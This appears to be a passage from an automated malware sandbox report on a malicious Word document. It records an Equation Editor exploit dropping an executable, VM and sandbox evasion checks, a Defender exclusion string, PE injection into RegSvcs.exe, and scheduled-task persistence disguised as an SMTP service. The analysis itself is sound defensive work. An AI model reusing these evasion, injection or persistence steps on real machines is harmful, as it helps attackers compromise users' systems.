        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 4.2.catzjt7863.exe.2459af8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.454727273.00000000024A6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2580Thread sleep time: -240000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exe TID: 2784Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exe TID: 2544Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\taskeng.exe TID: 2960Thread sleep time: -60000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 820Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2928Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0056410E sldt word ptr [eax]
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess information queried: ProcessInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D11C2 GetSystemInfo,
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
        Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: catzjt7863.exe, 00000004.00000002.456612980.0000000005030000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\catzjt7863.exe C:\Users\user\AppData\Roaming\catzjt7863.exe
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: RegSvcs.exe, 00000007.00000002.706021260.0000000002889000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
        Source: RegSvcs.exe, 00000007.00000002.705246427.00000000007E8000.00000004.00000020.sdmpBinary or memory string: Program Managerity Mode] - Microsoft Wordicrosoft Word2q
        Source: RegSvcs.exe, 00000007.00000002.706021260.0000000002889000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: RegSvcs.exe, 00000007.00000002.705657856.0000000000F60000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704678226.00000000007C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RegSvcs.exe, 00000007.00000002.705657856.0000000000F60000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704678226.00000000007C0000.00000002.00020000.sdmpBinary or memory string: !Progman
        Source: RegSvcs.exe, 00000007.00000002.705246427.00000000007E8000.00000004.00000020.sdmpBinary or memory string: Program Managerity Mode] - Microsoft Wordicrosoft Word
        Source: RegSvcs.exe, 00000007.00000002.705657856.0000000000F60000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704678226.00000000007C0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
        Source: RegSvcs.exe, 00000007.00000002.706021260.0000000002889000.00000004.00000001.sdmpBinary or memory string: Program Manager<
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
